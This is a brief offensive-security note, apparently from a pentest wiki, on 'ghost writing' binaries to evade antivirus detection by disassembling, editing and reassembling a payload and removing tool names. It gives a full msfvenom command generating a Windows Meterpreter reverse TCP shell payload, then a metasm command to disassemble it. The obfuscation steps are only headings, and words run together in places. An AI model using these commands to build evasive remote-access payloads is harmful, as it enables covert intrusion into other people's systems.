Ghost Writing Binaries
Create a .exe
Convert it to .asm
Edit the .asm file
Convert back to .exe Removing the Help menu of a tool
Removing instances of the tool name in the source codeGhost Writing How To
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asmObfuscation of ASM File
Convert Back
Last updated